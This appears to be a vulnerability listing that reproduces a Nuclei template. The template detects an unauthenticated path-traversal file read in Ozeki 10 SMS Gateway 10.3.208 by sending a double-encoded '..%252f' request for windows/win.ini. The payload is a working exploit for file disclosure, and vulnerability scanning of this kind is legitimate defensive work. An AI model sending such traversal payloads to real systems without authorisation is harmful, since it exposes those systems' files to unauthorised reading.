ozeki-10-sms-gateway: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read

日期: 2025-08-01 | 影响软件: Ozeki 10 SMS Gateway | POC: 已公开

漏洞描述

An arbitrary file read vulnerability, also known as a "path traversal" or "directory traversal" vulnerability, occurs when an attacker is able to access files on a system that they shouldn't have access to. This vulnerability arises from improper input validation or insufficient access controls in an application.

PoC代码[已公开]

id: ozeki-10-sms-gateway

info:
  name: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read
  author: r3Y3r53
  severity: high
  description: |
    An arbitrary file read vulnerability, also known as a "path traversal" or "directory traversal" vulnerability, occurs when an attacker is able to access files on a system that they shouldn't have access to. This vulnerability arises from improper input validation or insufficient access controls in an application.
  reference:
    - https://www.exploit-db.com/exploits/51646
    - https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
  metadata:
    verified: true
    max-request: 1
  tags: ozeki,lfi,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/octet-stream") && contains(body, "Mail") && contains(body, "files")'
        condition: and
# digest: 4b0a00483046022100b4ca1d71fa0d99cb0c364110cb39c51878d81dc634b01a896cbab6847a8b6079022100ba5e83cb4841cea8c39e8c664eee6c70ee2edaa8b7e006db805f441b2d707fb0:922c64590222798bb761d5b6d8e72950

相关漏洞推荐